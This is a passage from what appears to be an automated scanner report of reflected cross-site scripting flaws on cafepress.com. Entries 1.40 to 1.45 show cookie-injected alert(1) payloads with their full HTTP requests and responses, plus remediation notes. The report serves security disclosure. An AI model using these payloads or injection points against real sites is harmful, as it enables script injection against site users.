HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 88378 Date: Sun, 26 Dec 2010 13:46:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:45 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:45 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'da017</script><script>alert(1)</script>5b17e49d25b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.40. http://www.cafepress.com/+iphone-cases [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+iphone-cases
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1695"-alert(1)-"e836931d7c9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe1695"-alert(1)-"e836931d7c9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 65237 Date: Sun, 26 Dec 2010 13:48:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/ Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65237 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe1695"-alert(1)-"e836931d7c9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.41. http://www.cafepress.com/+iphone-cases [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+iphone-cases
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b572</script><script>alert(1)</script>4f6addec85e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4b572</script><script>alert(1)</script>4f6addec85e ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 65254 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65254 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '4b572</script><script>alert(1)</script>4f6addec85e ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.42. http://www.cafepress.com/+journals [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+journals
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2b67"-alert(1)-"894c7ad5c8f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+journals HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc2b67"-alert(1)-"894c7ad5c8f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 59370 Date: Sun, 26 Dec 2010 13:49:10 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/ Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59370 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc2b67"-alert(1)-"894c7ad5c8f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.43. http://www.cafepress.com/+journals [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+journals
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2e9e</script><script>alert(1)</script>cefee2eaa5b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+journals HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b2e9e</script><script>alert(1)</script>cefee2eaa5b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59387 Date: Sun, 26 Dec 2010 13:49:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:08 GMT; path=/ Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:08 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59387 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'b2e9e</script><script>alert(1)</script>cefee2eaa5b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.44. http://www.cafepress.com/+keepsake_boxes [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+keepsake_boxes
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18c76"-alert(1)-"2689714fbb2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+keepsake_boxes HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA18c76"-alert(1)-"2689714fbb2 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 59056 Date: Sun, 26 Dec 2010 13:49:12 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:12 GMT; path=/ Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:12 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA18c76"-alert(1)-"2689714fbb2 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.45. http://www.cafepress.com/+keepsake_boxes [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+keepsake_boxes
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f272a</script><script>alert(1)</script>d1528753cbe was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
